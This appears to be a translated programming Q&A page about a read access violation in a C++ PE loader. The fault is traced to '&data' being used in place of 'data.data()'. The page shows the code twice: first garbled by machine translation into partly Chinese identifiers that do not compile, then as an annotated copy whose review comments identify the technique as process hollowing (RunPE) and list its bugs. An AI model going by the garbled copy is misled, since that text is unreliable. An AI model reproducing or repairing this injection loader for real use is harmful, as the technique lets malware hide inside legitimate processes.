C++ PE加载程序读取访问冲突
当我尝试将其作为无符号字符数组加载时,没有问题。但作为向量加载时,下面这一行会出错:
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // read access violation
有什么问题?我不能把它作为向量加载吗?
所有代码如下:
unsigned char example[100000]{};
std::矢量数据{
//字节
};
无效pe_荷载(){
void*pe=&data;
图像_DOS_头*DOS头;
图像头64*n头;
图像\节\头*节头;
处理信息;
新创资讯科技有限公司;
零内存(&PI,sizeof(PI));
零内存(&SI,sizeof(SI));
void*pImageBase;
char currentFilePath[1024];
DOSHeader=PIMAGE\U DOS\U头(pe);
nHeader=PIMAGE\u NT\u HEADERS64(DWORD64(pe)+DOSEADER->e\u lfanew);
如果(n标题->签名==图像\u NT\u签名){
GetModuleFileNameA(NULL,currentFilePath,MAX_PATH);
if(CreateProcessA(currentFilePath,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&SI,&PI)){
上下文*CTX;
CTX=LPCONTEXT(VirtualAlloc(NULL,sizeof(CTX),MEM_COMMIT,PAGE_READWRITE));
CTX->ContextFlags=CONTEXT\u FULL;
UINT64 imageBase=0;
if(GetThreadContext(PI.hThread,LPCONTEXT(CTX))){
pImageBase=VirtualAllocEx(
PI.hProcess,
LPVOID(n标题->可选标题.ImageBase),
n标题->可选标题.SizeOfImage,
记住承诺,记住保留,
页面\执行\读写
);
WriteProcessMemory(PI.hProcess,pImageBase,pe,NtHeader->OptionalHeader.SizeOfHeaders,NULL);
//写体育课
对于(size\u t i=0;i文件头.NumberOfSections;i++)
{
SectionHeader=PIMAGE_SECTION_HEADER(DWORD64(pe)+DOSEADER->e_lfanew+264+(i*40));
写进程存储器(
PI.hProcess,
LPVOID(DWORD64(pImageBase)+节头->虚拟服装),
LPVOID(DWORD64(pe)+节头->指针或数据),
SectionHeader->SizeOfRawData,
无效的
);
写进程存储器(
PI.hProcess,
LPVOID(CTX->Rdx+0x10),
LPVOID(&n标题->OptionalHeader.ImageBase),
8.
无效的
);
}
CTX->Rcx=DWORD64(pImageBase)+nHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread,LPCONTEXT(CTX));
恢复线程(PI.hThread);
WaitForSingleObject(PI.hProcess,NULL);
}
}
}
}
我不知道这到底是什么原因。但我确实需要你的帮助,我什么也找不到。它可以很好地处理char数组,但我想将其作为向量加载。提前谢谢您。
`void* pe = &data;` 看起来像个问题(`&data` 取的是 vector 对象本身的地址,而不是其中字节缓冲区的地址)。你是说 `void* pe = data.data();`?
@PatrickRoberts 非常感谢你。我不知道我怎么忽略了它。我为自己现在问这么愚蠢的问题感到羞愧。
// Fixed-size, zero-initialised byte array. The question says loading the image
// from an array works; pe_load as shown on this page does not reference it.
unsigned char example[100000] = {};
// The PE image bytes held in a vector (the actual bytes are elided on the page).
std::vector<unsigned char> data = {
    // Bytes
};
// Parses the PE image held in the global `data`, starts a suspended copy of the
// current executable, allocates memory in that process at the image's preferred
// base, copies the headers and sections into it, rewrites the suspended thread's
// context and resumes it.
//
// NOTE(review): the sequence CREATE_SUSPENDED -> VirtualAllocEx(RWX) ->
// WriteProcessMemory -> SetThreadContext -> ResumeThread resembles what is
// commonly called process hollowing / RunPE (no unmapping of the original image
// is visible here). Endpoint monitoring commonly flags this API sequence, and in
// particular the PAGE_EXECUTE_READWRITE allocation in another process.
//
// NOTE(review): every size and offset below is taken from the image itself and
// none is checked against data.size(), so a truncated or malformed image leads
// to out-of-bounds reads of the local buffer. No API return value other than
// those of CreateProcessA and GetThreadContext is checked.
void pe_load() {
// BUG (the read access violation asked about on this page): &data is the address
// of the std::vector object, not of the bytes it owns, so the header reads below
// interpret the vector's internal members as a PE header. The answer on this page
// points to data.data() instead.
void* pe = &data;
IMAGE_DOS_HEADER* DOSHeader;
IMAGE_NT_HEADERS64* NtHeader;
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
ZeroMemory(&PI, sizeof(PI));
ZeroMemory(&SI, sizeof(SI));
void* pImageBase;
// Buffer is 1024 bytes, but only MAX_PATH is passed to GetModuleFileNameA below.
char currentFilePath[1024];
DOSHeader = PIMAGE_DOS_HEADER(pe);
// NOTE(review): e_magic is never checked and e_lfanew is used unvalidated, so
// NtHeader can point anywhere relative to pe.
NtHeader = PIMAGE_NT_HEADERS64(DWORD64(pe) + DOSHeader->e_lfanew);
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {
// Passing NULL asks for the path of the current process's own executable.
GetModuleFileNameA(NULL, currentFilePath, MAX_PATH);
if (CreateProcessA(currentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) {
CONTEXT* CTX;
// NOTE(review): sizeof(CTX) is the size of the pointer, not of CONTEXT;
// sizeof(CONTEXT) was presumably intended. This likely only works because
// VirtualAlloc rounds the request up to a whole page. The allocation is never
// released in this function.
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
// Unused local.
UINT64 imageBase = 0;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {
// Requests the image's preferred base in the new process. The result is not
// checked, so a NULL pImageBase would flow into every write below.
pImageBase = VirtualAllocEx(
PI.hProcess,
LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
// Copies SizeOfHeaders bytes from the start of the local image.
WriteProcessMemory(PI.hProcess, pImageBase, pe, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
// Copy each section's raw data to its VirtualAddress in the remote allocation.
for (size_t i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
{
// NOTE(review): 264 and 40 look like sizeof(IMAGE_NT_HEADERS64) and
// sizeof(IMAGE_SECTION_HEADER) written as literals; this ignores
// FileHeader.SizeOfOptionalHeader, which the IMAGE_FIRST_SECTION macro
// accounts for — confirm.
SectionHeader = PIMAGE_SECTION_HEADER(DWORD64(pe) + DOSHeader->e_lfanew + 264 + (i * 40));
// PointerToRawData and SizeOfRawData are not bounds-checked against the buffer.
WriteProcessMemory(
PI.hProcess,
LPVOID(DWORD64(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD64(pe) + SectionHeader->PointerToRawData),
SectionHeader->SizeOfRawData,
NULL
);
// Writes the 8-byte ImageBase value to Rdx + 0x10 in the remote process
// (presumably the PEB's image-base field — confirm). Nothing here depends
// on i, yet the write is repeated once per section.
WriteProcessMemory(
PI.hProcess,
LPVOID(CTX->Rdx + 0x10),
LPVOID(&NtHeader->OptionalHeader.ImageBase),
8,
NULL
);
}
// Point the suspended thread's Rcx at the image's entry point, then resume it.
CTX->Rcx = DWORD64(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
// NOTE(review): the timeout argument NULL is 0, so this returns immediately
// instead of waiting; INFINITE was presumably intended. PI.hProcess and
// PI.hThread are never closed in this function.
WaitForSingleObject(PI.hProcess, NULL);
}
}
}
}